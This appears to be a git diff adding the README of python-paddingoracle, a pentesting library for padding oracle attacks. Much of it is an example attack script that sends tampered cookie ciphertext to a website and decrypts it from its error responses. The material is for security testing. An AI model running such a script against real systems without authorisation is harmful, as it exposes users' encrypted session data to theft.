|
| 1 | +python-paddingoracle: A portable, padding oracle exploit API |
| 2 | +============================================================ |
| 3 | + |
| 4 | +python-paddingoracle is an API that provides pentesters a customizable |
| 5 | +alternative to `PadBuster`_ and other padding oracle exploit tools that can't |
| 6 | +easily (without a heavy rewrite) be used in unique, per-app scenarios. Think |
| 7 | +non-HTTP applications, raw sockets, client applications, unique encodings, etc. |
| 8 | + |
| 9 | +Usage: |
| 10 | +------ |
| 11 | + |
| 12 | +To use the paddingoracle API, simply implement the **oracle()** method from the |
| 13 | +PaddingOracle API and raise a **BadPaddingException** when the decrypter |
| 14 | +reveals a padding oracle. To decrypt data, pass raw encrypted bytes as a |
| 15 | +`bytearray <http://docs.python.org/2/library/functions.html#bytearray>`_ to |
| 16 | +**decrypt()**. |
| 17 | + |
| 18 | +See below for an example (from `the example`_): :: |
| 19 | + |
| 20 | + from paddingoracle import BadPaddingException, PaddingOracle |
| 21 | + from base64 import b64encode, b64decode |
| 22 | + from urllib import quote, unquote |
| 23 | + import requests |
| 24 | + import socket |
| 25 | + import time |
| 26 | + |
| 27 | + class PadBuster(PaddingOracle): |
| 28 | + def __init__(self, **kwargs): |
| 29 | + PaddingOracle.__init__(self, **kwargs) |
| 30 | + self.session = requests.session(prefetch=True, timeout=5, verify=False) |
| 31 | + |
| 32 | + def oracle(self, data): |
| 33 | + somecookie = quote(b64encode(data)) |
| 34 | + self.session.cookies['somecookie'] = somecookie |
| 35 | + |
| 36 | + while 1: |
| 37 | + try: |
| 38 | + response = self.session.get('http://www.example.com/') |
| 39 | + break |
| 40 | + except (socket.error, requests.exceptions.SSLError): |
| 41 | + time.sleep(2) |
| 42 | + continue |
| 43 | + |
| 44 | + self.history.append(response) |
| 45 | + |
| 46 | + if response.ok: |
| 47 | + logging.debug('No padding exception raised on %r', cookie) |
| 48 | + return |
| 49 | + |
| 50 | + # An HTTP 500 error was returned, likely due to incorrect padding |
| 51 | + raise BadPaddingException |
| 52 | + |
| 53 | + if __name__ == '__main__': |
| 54 | + import logging |
| 55 | + import sys |
| 56 | + |
| 57 | + if not sys.argv[1:]: |
| 58 | + print 'Usage: %s <somecookie value>' % (sys.argv[0], ) |
| 59 | + sys.exit(1) |
| 60 | + |
| 61 | + logging.basicConfig(level=logging.DEBUG) |
| 62 | + |
| 63 | + encrypted_cookie = b64decode(unquote(sys.argv[1])) |
| 64 | + |
| 65 | + padbuster = PadBuster() |
| 66 | + |
| 67 | + cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8)) |
| 68 | + |
| 69 | + print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie)) |
| 70 | + |
| 71 | + |
| 72 | +Credits |
| 73 | +------- |
| 74 | +python-paddingoracle is a Python implementation heavily based on `PadBuster`_, |
| 75 | +an automated script for performing Padding Oracle attacks, developed by |
| 76 | +Brian Holyfield of Gotham Digital Science. |
| 77 | + |
| 78 | +.. _`the example`: https://github.com/mwielgoszewski/python-paddingoracle/blob/master/example.py |
| 79 | +.. _`PadBuster`: https://github.com/GDSSecurity/PadBuster |
| 80 | + |
0 commit comments